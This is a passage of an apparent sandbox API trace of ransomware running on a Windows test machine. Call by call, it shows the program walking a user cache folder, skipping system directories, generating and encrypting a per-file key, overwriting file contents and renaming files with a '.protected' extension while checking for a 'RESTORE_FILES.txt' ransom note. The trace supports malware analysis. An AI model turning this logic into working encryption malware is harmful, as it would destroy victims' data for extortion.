HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 151 [0087.732] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".txt") returned 0x0 [0087.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 151 [0087.733] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".rar") returned 0x0 [0087.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 151 [0087.733] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".zip") returned 0x0 [0087.733] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x58b, lpOverlapped=0x0) returned 1 [0087.734] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.734] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x58b, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x58b, lpOverlapped=0x0) returned 1 [0087.734] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.734] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.734] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.734] CloseHandle (hObject=0x150) returned 1 [0087.734] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.protected") returned 161 [0087.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.protected")) returned 1 [0087.735] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.735] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Windows") returned -1 [0087.735] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Program Files") returned -1 [0087.735] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Program Files (x86)") returned -1 [0087.735] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="$Recycle.bin") returned 1 [0087.735] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="System Volume Information") returned -1 [0087.735] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 151 [0087.735] StrStrIW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".protected") returned 0x0 [0087.735] lstrcmpW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="RESTORE_FILES.txt") returned -1 [0087.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.736] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 151 [0087.736] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".txt") returned 0x0 [0087.736] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 151 [0087.736] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".rar") returned 0x0 [0087.736] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 151 [0087.736] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".zip") returned 0x0 [0087.736] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xb68, lpOverlapped=0x0) returned 1 [0087.869] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff498, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.870] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xb68, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xb68, lpOverlapped=0x0) returned 1 [0087.870] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.870] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.870] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.870] CloseHandle (hObject=0x150) returned 1 [0087.870] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.protected") returned 161 [0087.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.protected")) returned 1 [0087.871] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.871] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Windows") returned -1 [0087.871] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Program Files") returned -1 [0087.871] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Program Files (x86)") returned -1 [0087.871] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="$Recycle.bin") returned 1 [0087.871] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="System Volume Information") returned -1 [0087.871] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 151 [0087.871] StrStrIW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".protected") returned 0x0 [0087.871] lstrcmpW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="RESTORE_FILES.txt") returned -1 [0087.871] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.871] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.876] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 151 [0087.876] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".txt") returned 0x0 [0087.876] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 151 [0087.876] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".rar") returned 0x0 [0087.876] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 151 [0087.876] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".zip") returned 0x0 [0087.876] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0087.877] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.877] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0087.877] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.877] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.877] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.877] CloseHandle (hObject=0x150) returned 1 [0087.878] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.protected") returned 161 [0087.878] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.protected")) returned 1 [0087.878] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.878] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Windows") returned -1 [0087.878] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Program Files") returned -1 [0087.878] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Program Files (x86)") returned -1 [0087.878] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="$Recycle.bin") returned 1 [0087.878] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="System Volume Information") returned -1 [0087.878] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 151 [0087.879] StrStrIW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".protected") returned 0x0 [0087.879] lstrcmpW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="RESTORE_FILES.txt") returned -1 [0087.879] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.879] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.879] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 151 [0087.879] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".txt") returned 0x0 [0087.879] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 151 [0087.879] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".rar") returned 0x0 [0087.879] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 151 [0087.879] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".zip") returned 0x0 [0087.879] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x680, lpOverlapped=0x0) returned 1 [0087.945] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff980, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.946] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x680, lpOverlapped=0x0) returned 1 [0087.946] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.946] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.946] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.946] CloseHandle (hObject=0x150) returned 1 [0087.946] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.protected") returned 161 [0087.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.protected")) returned 1 [0087.947] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.947] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Windows") returned -1 [0087.947] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Program Files") returned -1 [0087.947] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Program Files (x86)") returned -1 [0087.947] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="$Recycle.bin") returned 1 [0087.947] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="System Volume Information") returned -1 [0087.948] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 151 [0087.948] StrStrIW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".protected") returned 0x0 [0087.948] lstrcmpW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="RESTORE_FILES.txt") returned -1 [0087.948] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.948] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.952] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 151 [0087.952] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".txt") returned 0x0 [0087.952] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 151 [0087.952] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".rar") returned 0x0 [0087.952] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 151 [0087.952] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".zip") returned 0x0 [0087.952] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2d7, lpOverlapped=0x0) returned 1 [0088.052] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.052] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x295e7b4, 